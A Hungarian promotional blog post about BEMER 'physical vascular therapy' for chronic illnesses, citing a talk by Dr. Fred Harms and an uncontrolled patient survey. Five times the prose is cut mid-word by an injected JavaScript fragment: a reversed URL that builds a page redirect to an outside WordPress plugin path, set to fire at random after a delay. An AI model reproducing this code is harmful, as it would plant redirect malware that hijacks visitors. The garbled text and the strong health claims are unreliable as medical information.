Dr. Fred Harms professzor úr gondolatmenete a krónikus és akut betegségek ellátási és megoldási kérdéseit feszegette. amíg egy akut beavatkozásnál az orvosi protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokollok betartása a fegyelmezett és gyors beavatkozás életet menthet. De mi a helyzet a krónikus megbetegedésekkel.
chronic diseases
Manapság a háziorvosok idejük 85 % ban 4-5 betegségcsoporttal foglalkozik (amelyekről előző blogomban írtam: hátfájás, kardiovaszkuláris panaszok, 2-es típusú cukorbetegség, depresszió, a dohányosok pedig COPD tüneteivel) Egy nagyon fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos megállapítás, hogy amíg az akut ellátásban az orvosnak és egészségügyi személyzetnek van kiemelt szerepe az alkalmazott gyógymód sikerében, addig a fent említett krónikus betegségekben magának a leginkább érintett személynek van a legnagyobb befolyása a terápia sikerére. A BEMER terápiáról weboldalunkon ( www.mediforte.hu ) nagyon sokat olvashat, most erre részletesen nem térnék ki. A gyógyszerekkel elérhető eredmények nagyon korlátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozottak, különösen a kisebb, autóritmikus érfalmozgással bíró arteriolák esetében ezért a mikrokeringési rendszer kezelésére gyakorlatilag egyedülálló a BEMER fizikai érterápia. Ha figyelembe vesszük, hogy több keringési megbetegedés hátterében állapítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották meg a diszfunkcionális mikrokeringést, mint okot, ami több hétköznapi betegséget (hátfájás, 2-es típusú diabetesz, szív és érrendszeri betegségek) is hátrányosan befolyásol, akkor rögtön egyértelművé válik a komplementer terápia (kiegészítő gyógymód) koncepciójának orvosi és gazdasági jelentősége. Habár a BEMER fizikai érterápia orvosilag releváns hatásai nem teszik lehetővé az eddig alkalmazott kezelési elgondolások elvetését, mégis hatékony terápiára optimalizált kiegészítő módszerként alkalmazható több különböző indikáció esetén.
chronic diseases

Dr. Fred Harms professzor úr ismertetett egy piaci utánkövetést, amelyet 2011 áprilisa és 2013 március között 658 beteg bevonásával végeztek. Módszertanról elmondható, hogy validált betegkérdőívek segítségével végezték. Három paramétert mértek a kérdőívek:

  • alvászavarok ( Jensen score )
  • Borg- féle fájdalomintenzitás
  • SF12 azaz a testi egészségügyi állapot ( életminőség )

Az összes beteg közül, akik a vizsgálatban részvettek 48%-uk tapasztalt javulást. Erről a betegcsoportról el kell mondani, hogy több mint fele (megközelítőleg 70%) már több mint egy éve érzett tüneteket. A betegek toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további 20%-a számolt be részleges javulásról.

Ebből a szempontból az összes felhasználó 2/3-ának használt a BEMER fizikai érterápia.

diabetes